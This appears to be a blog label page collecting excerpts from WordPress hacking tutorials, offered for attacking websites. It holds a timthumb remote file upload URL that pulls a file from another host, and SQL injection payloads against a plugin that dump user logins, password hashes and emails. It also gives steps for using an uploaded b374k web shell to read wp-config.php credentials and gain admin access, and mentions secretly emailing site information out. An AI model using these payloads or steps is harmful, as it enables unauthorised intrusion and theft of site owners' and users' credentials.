Showing posts with label WORDPRESS SITE HACK. Show all posts
Showing posts with label WORDPRESS SITE HACK. Show all posts

How to hack Wordpress site?!!!

 We will continue our hacking wordpress tutorial series, today title is Hacking WordPress: Send Email Secretly About Website Information. This tutorial was highly related with our last tutorial about  As I already stated on the last wordpress hacking tutorial, "Do not think too complex about this tutorial, because we will learn...

Wordpress timthumb remote file upload Vulnerability

In this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website this bug known as "timthumb.php" exploit exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat example...

Wordpress SQL Injection Hacks

there are Million of  sites which hosted on wordpress.Its new Tutorial on wordpress hacking with SQL injections, lets see How To use it ?  For Example  1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*  Now...

How To Gain Admin acess on wordpress websites after uploading shell

if you want acess in same site where you uploaded shell then simply edit wp-config.php Copy MySQL Database's username and password from wp-config.php Now Goto MYSQL option in b374k shell  and paste username and password there Now Click on Go Now you wil get 2 tables There click on table below information_schema click on 2 table and find wp_users columns...
Subscribe to: Posts (Atom)